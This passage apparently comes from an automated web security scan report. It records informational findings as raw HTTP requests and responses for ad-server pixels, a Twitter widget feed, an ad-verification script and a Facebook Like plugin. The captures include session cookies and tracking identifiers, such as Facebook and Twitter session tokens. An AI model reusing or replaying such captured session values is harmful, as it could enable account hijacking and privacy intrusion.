P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 12-Apr-2011 16:41:48 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D";Path=/;Domain=.adbrite.com;Expires=Thu, 08-Apr-2021 16:41:48 GMT
Set-Cookie: fq=;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 16:41:48 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.6. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Request 1

GET /adserver/vdi/762701?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052a6@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:50 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:50 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/762701?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=;Path=/;Domain=.adbrite.com;Expires=Sat, 09-Apr-2011 12:36:22 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:22 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.7. http://ads.adbrite.com/adserver/vdi/779045  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Request 1

GET /adserver/vdi/779045?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b0@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:00 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:779045:20861280:37820808542507095:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:00 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/779045?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:31 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=;Path=/;Domain=.adbrite.com;Expires=Sat, 09-Apr-2011 12:36:31 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:779045:20861280:37820808542507095:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:31 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.8. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_DAN/lists/wcaxweather/statuses.json

Request 1

GET /1/WCAX_DAN/lists/wcaxweather/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352244311=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en

Response 1

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352251-30597-14967
X-RateLimit-Limit: 150
ETag: "350bcab9704451c63ab3f21f69a9eb28"-gzip
Last-Modified: Sat, 09 Apr 2011 12:30:51 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02792
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCBJPjovAToHaWQiJTdhYWFkN2QzZGMzMzVk%250ANGIwNGFjZjllZjhmZTA2YTQ5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e2f772c7bb1d7130fafe5220eaad1a5066753ead; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 37156

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56489775208730624","text":"Spring is here to stay! Chance for a few showers late Sunday, then 70s on Monday. Have a great weekend. http:\/\/twitpic.com\/4ign5t","place":null,"coordinates":null,"truncated":false,"source":"\u003Ca href=\"http:\/\/twitpic.com\" rel=\"nofollow\"\u003ETwitpic\u003C\/a\u003E","geo":null,"in_reply_to_user_id":null,"in_reply_to_status_id":null,"favorited":false,"created_at":"Fri Apr 08 22:53:06 +0000 2011","retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"user":{"id_str":"29873555","profile_background_tile":true,"url":"http:\/\/www.wcax.com","screen_name":"WCAX_Dan","show_all_inline_media":false,"follow_request_sent":false,"geo_enabled":true,"description":"Meteorologist for WCAX-TV in Burlington, VT; Broadcast Television professor at Lyndon State College","lang":"en","profile_link_color":"13719c","location":"Burlington, VT","profile_sidebar_border_color":"1b93cb","followers_count":599,"is_translator":false,"statuses_count":596,"friends_count":415,"default_profile":false,"listed_count":33,"profile_use_background_image":true,"contributors_enabled":false,"verified":false,"created_at":"Thu Apr 09 00:49:30 +0000 2009","profile_background_color":"B2DFDA","following":true,"notifications":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/230110140\/627C0D73843C5D760C596A21738D1D_13.PNG","favourites_count":0,"protected":false,"name":"Dan Dowling","default_profile_i
...[SNIP]...

Request 2

GET /1/WCAX_DAN/lists/wcaxweather/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352244311=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en

Response 2

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352259-40834-7840
X-RateLimit-Limit: 150
ETag: "350bcab9704451c63ab3f21f69a9eb28"-gzip
Last-Modified: Sat, 09 Apr 2011 12:30:59 GMT
X-RateLimit-Remaining: 119
X-Runtime: 0.06627
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHFpPjovAToHaWQiJTBhMDgxYTkyMmEyM2Y0%250AY2MzYTY4N2M1MzVhNWM2OGY2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8815ccf08676d187b64613bc40040c8c60a8689f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 37156

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56489775208730624","text":"Spring is here to stay! Chance for a few showers late Sunday, then 70s on Monday. Have a great weekend. http:\/\/twitpic.com\/4ign5t","place":null,"coordinates":null,"truncated":false,"source":"\u003Ca href=\"http:\/\/twitpic.com\" rel=\"nofollow\"\u003ETwitpic\u003C\/a\u003E","geo":null,"in_reply_to_user_id":null,"in_reply_to_status_id":null,"favorited":false,"created_at":"Fri Apr 08 22:53:06 +0000 2011","retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"user":{"id_str":"29873555","profile_background_tile":true,"url":"http:\/\/www.wcax.com","screen_name":"WCAX_Dan","show_all_inline_media":false,"follow_request_sent":false,"geo_enabled":true,"description":"Meteorologist for WCAX-TV in Burlington, VT; Broadcast Television professor at Lyndon State College","lang":"en","profile_link_color":"13719c","location":"Burlington, VT","profile_sidebar_border_color":"1b93cb","followers_count":599,"is_translator":false,"statuses_count":596,"friends_count":415,"default_profile":false,"listed_count":33,"profile_use_background_image":true,"contributors_enabled":false,"verified":false,"created_at":"Thu Apr 09 00:49:30 +0000 2009","profile_background_color":"B2DFDA","following":true,"notifications":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/230110140\/627C0D73843C5D760C596A21738D1D_13.PNG","favourites_count":0,"protected":false,"name":"Dan Dowling","default_profile_image":false,"time_zone":"Eastern Time (US & Canada)","profile_text_color":"333333","profile_image_url":"h
...[SNIP]...
8.9. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Request 1

GET /jspix?anId=140&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:20 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3885A4106257F5F9745999B829F8DC88; Path=/
Connection: keep-alive
Content-Length: 8937


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&H===A.DIR){if(typeof F==="object"){for(var G in F){if(F.hasOwnProperty(G)){var B=(typeof D!=="undefined")?D+" : ":"";k(F[G],H,B+G);}}}else{try{console.log(D+": "+F);}catch(E){}}}else{try{console[H](F);}catch(C){}}}};var s=function(D,C){var B,G,F;k("Server Parameters:");k(adsafeVisParams,A.DIR);var E="Detection Results:\n\n";for(B in D){F=D[B];E+=F.key+": "+decodeURIComponent(F.val)+"\n";}k(E);E="key: \n";for(G in C){if(C.hasOwnProperty(G)){E+=G+": "+C[G]+"\n";}}k(E);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var o=function(){var B={};try{B.a=encodeURIComponent(top.location.href);}catch(E){}try{B.b=e
...[SNIP]...

Request 2

GET /jspix?anId=140&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BCC87015F212DAA5DA9C5D39C989B644; Path=/
Connection: keep-alive
Content-Length: 8244


var adsafeVisParams = {
   mode : "jspix",
   jsref : "null",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&H===A.DIR){if(typeof F==="object"){for(var G in F){if(F.hasOwnProperty(G)){var B=(typeof D!=="undefined")?D+" : ":"";k(F[G],H,B+G);}}}else{try{console.log(D+": "+F);}catch(E){}}}else{try{console[H](F);}catch(C){}}}};var s=function(D,C){var B,G,F;k("Server Parameters:");k(adsafeVisParams,A.DIR);var E="Detection Results:\n\n";for(B in D){F=D[B];E+=F.key+": "+decodeURIComponent(F.val)+"\n";}k(E);E="key: \n";for(G in C){if(C.hasOwnProperty(G)){E+=G+": "+C[G]+"\n";}}k(E);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var o=function(){var B={};try{B.a=encodeURIComponent(top.location.href);}catch(E){}try{B.b=encodeURIComponent(parent.location.href);}catch(E){}try{B.c=encodeURIComponent(parent.document.referrer);}catch(E){}try{B.d=encodeURIComponent(window.location.href);}catch(E){}try{B.e=encodeURIComponent(window.document.referrer);}catch(E){}try{B.f=encodeURIComponent(adsafeVisParams.jsref);}catch(E){}try{var D=a();B.g=encodeURIComponent(D.g);B.q=encodeURIComponent(D.q);}catch(E){}B=l(B);B=m(B);var C=[];for(var F in B){if(B.hasOwnProperty(F)){C.push({key:F,val:B[F]});}}C.sort(function(H,G){return(H.val.length>G.val.length)?1:(H.val.length<G.val.length)?-1:0;});s(C,j);return C;};var l=function(B){for(var D in B){if(B.hasOwnProperty(D)){var C=B[D];if(C==""||C=="null"||C=="undefined"||C==nu
...[SNIP]...
8.10. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3a%2f%2fwww.wptz.com%2fnews%2f27483035%2fdetail.html&layout=button_count&show-faces=false&width=125&action=recommend&font=verdana&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.15.110
X-Cnection: close
Date: Sat, 09 Apr 2011 12:30:42 GMT
Content-Length: 866

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=6084"+"&m="+m;},5000)
...[SNIP]...
<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 http:\/\/www.wptz.com\/news\/27483035\/detail.html");}catch(e){si_cj("2 \thttp:\/\/www.wptz.com\/news\/27483035\/detail.html");}}/*]]>*/</script><script>window.location.replace("https:\/\/www.facebook.com\/plugins\/like.php?href=http\u00253A\u00252F\u00252Fwww.wptz.com\u00252Fnews\u00252F27483035\u00252Fdetail.html&layout=button_count&show-faces=false&width=125&action=recommend&font=verdana&colorscheme=light");</script>

Request 2

GET /plugins/like.php?href=http%3a%2f%2fwww.wptz.com%2fnews%2f27483035%2fdetail.html&layout=button_count&show-faces=false&width=125&action=recommend&font=verdana&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.247.103
X-Cnection: close
Date: Sat, 09 Apr 2011 12:31:27 GMT
Content-Length: 766

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=7815"+"&m="+m;},5000)
...[SNIP]...
<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 ");}catch(e){si_cj("2 \t");}}/*]]>*/</script><script>window.location.replace("https:\/\/www.facebook.com\/plugins\/like.php?href=http\u00253A\u00252F\u00252Fwww.wptz.com\u00252Fnews\u00252F27483035\u00252Fdetail.html&layout=button_count&show-faces=false&width=125&action=recommend&font=verdana&colorscheme=light");</script>
8.11. http://www.youtube.com/v/BXKQ0elgHdY  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /v/BXKQ0elgHdY

